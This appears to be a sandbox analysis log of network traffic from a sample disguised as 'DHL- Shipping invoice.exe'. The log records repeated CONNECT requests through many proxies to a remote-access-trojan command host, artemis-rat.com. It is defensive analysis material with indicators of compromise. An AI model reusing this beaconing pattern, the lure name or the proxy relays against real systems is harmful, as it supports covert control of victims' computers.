                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            654192.168.2.45221389.165.40.84436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.451086998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            655192.168.2.45221489.165.40.84436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.452356100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            656192.168.2.45221589.165.40.84436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.453344107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            657192.168.2.45118536.93.15.53654456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.456398010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            658192.168.2.452261188.114.98.254436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.468206882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            659192.168.2.452264188.114.98.254436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.469676018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            660192.168.2.452266188.114.98.254436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.470963955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            661192.168.2.452270188.114.98.254436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.472182035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            662192.168.2.45215052.151.210.20490006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.475383997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            663192.168.2.4520024.144.161.159806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.517858982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            664192.168.2.452140138.197.148.215806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.519159079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.901751995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.447494030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.232641935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750478029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250555992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750197887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750164986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.725684881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            665192.168.2.45204089.35.237.1879996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.521086931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.763200998 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:06.731806993 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            666192.168.2.452012121.159.146.251806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.521490097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            667192.168.2.451217192.252.216.8141456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.521539927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            668192.168.2.45200847.243.114.19281806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.523226023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            669192.168.2.452151162.241.46.54583306484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.523529053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.901751995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.250196934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.953336000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.343961954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.741281033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.141043901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.932600975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.344063044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            670192.168.2.45205877.77.64.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.530704975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            671192.168.2.45214638.54.101.25490006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.531894922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.688744068 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            672192.168.2.452062147.75.92.25194016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.535512924 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:01.798685074 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            673192.168.2.449780204.199.120.289996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.535967112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.562531948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562973022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            674192.168.2.45214898.175.31.19541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.538988113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            675192.168.2.452219104.21.223.181806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.543134928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.630717039 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            676192.168.2.45215498.181.137.8041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.543874025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            677192.168.2.45213788.99.138.2152886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.544544935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            678192.168.2.45233243.157.49.2044436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.545885086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            679192.168.2.45233543.157.49.2044436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.548389912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            680192.168.2.45234043.157.49.2044436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.550014019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            681192.168.2.45234143.157.49.2044436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.551518917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            682192.168.2.452189162.241.50.179498586484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.552659988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.062661886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.562707901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.250619888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750123024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250216007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.765878916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.453232050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.859708071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            683192.168.2.452257104.24.35.152806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.554990053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.642414093 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            684192.168.2.452163178.128.200.87806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.556752920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.770636082 CET536INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:12 GMT
                            Server: Apache/2.4.29 (Ubuntu)
                            Content-Length: 614
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
